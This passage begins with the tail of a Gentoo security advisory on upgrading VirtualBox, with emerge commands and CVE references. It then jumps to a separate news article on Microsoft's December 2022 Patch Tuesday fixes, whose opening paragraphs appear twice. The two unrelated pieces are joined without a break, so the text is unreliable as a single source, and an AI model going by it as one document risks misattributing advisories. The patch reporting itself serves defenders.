  # emerge --ask --oneshot --verbose ">=app-emulation/virtualbox-6.1.40"

All Oracle VirtualBox modules users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/virtualbox-modules-6.1.40"

References  
=========  
[ 1 ] CVE-2022-21620  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21620  
[ 2 ] CVE-2022-21621  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21621  
[ 3 ] CVE-2022-21627  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21627  
[ 4 ] CVE-2022-39421  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39421  
[ 5 ] CVE-2022-39422  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39422  
[ 6 ] CVE-2022-39423  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39423  
[ 7 ] CVE-2022-39424  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39424  
[ 8 ] CVE-2022-39425  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39425  
[ 9 ] CVE-2022-39426  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39426

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202212-03

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202212-03

Tech giant Microsoft released its last set of monthly security updates for 2022 with fixes for 49 vulnerabilities across its software products.
Of the 49 bugs, six are rated Critical, 40 are rated Important, and three are rated Moderate in severity. The updates are in addition to 24 vulnerabilities that have been addressed in the Chromium-based Edge browser since the start of the month.

Patch Management / Vulnerability

Tech giant Microsoft released its last set of monthly security updates for 2022 with fixes for 49 vulnerabilities across its software products.

Of the 49 bugs, six are rated Critical, 40 are rated Important, and three are rated Moderate in severity. The updates are in addition to 24 vulnerabilities that have been addressed in the Chromium-based Edge browser since the start of the month.

December's Patch Tuesday plugs two zero-day vulnerabilities, one that's actively exploited and another issue that's listed as publicly disclosed at the time of release.

The former relates to CVE-2022-44698 (CVSS score: 5.4), one of the three security bypass issues in Windows SmartScreen that could be exploited by a malicious actor to evade mark of the web (MotW) protections.

It's worth noting that this issue, in conjunction with CVE-2022-41091 (CVSS score: 5.4), has been observed being exploited by Magniber ransomware actors to deliver rogue JavaScript files within ZIP archives.

"It allows attackers to craft documents that won't get tagged with Microsoft's 'Mark of the Web' despite being downloaded from untrusted sites," Rapid7's Greg Wiseman said. "This means no Protected View for Microsoft Office documents, making it easier to get users to do sketchy things like execute malicious macros."

Publicly disclosed, but not seen actively exploited, is CVE-2022-44710 (CVSS score: 7.8), an elevation of privilege flaw in DirectX Graphics Kernel that could enable an adversary to gain SYSTEM privileges.

"Successful exploitation of this vulnerability requires an attacker to win a race condition," Microsoft pointed out in an advisory.

Also patched by Microsoft are multiple remote code execution bugs in Microsoft Dynamics NAV, Microsoft SharePoint Server, PowerShell, Windows Secure Socket Tunneling Protocol (SSTP), .NET Framework, Contacts, and Terminal.

Furthermore, the update also resolves 11 remote code execution vulnerabilities in Microsoft Office Graphics, OneNote, and Visio, all of which are rated 7.8 in the CVSS scoring system.

Two of the 19 elevation of privilege flaws remediated this month comprises fixes for the Windows Print Spooler component (CVE-2022-44678 and CVE-2022-44681, CVSS scores: 7.8), continuing a steady stream of patches released by the company over the past year.

Last but not least, Microsoft has assigned the "Exploitation More Likely" tag to the PowerShell remote code execution vulnerability (CVE-2022-41076, CVSS score: 8.5) and Windows Sysmon privilege escalation flaw (CVE-2022-44704, CVSS score: 7.8), making it essential that users apply updates to mitigate potential threats.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past two weeks to rectify several vulnerabilities, including —

*   Adobe
*   Android
*   Apple
*   Cisco
*   Citrix
*   CODESYS
*   Dell
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   HP
*   IBM
*   Intel
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NVIDIA
*   Qualcomm
*   SAP
*   Schneider Electric
*   Siemens
*   Sophos
*   Trend Micro, and
*   VMware

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#oracle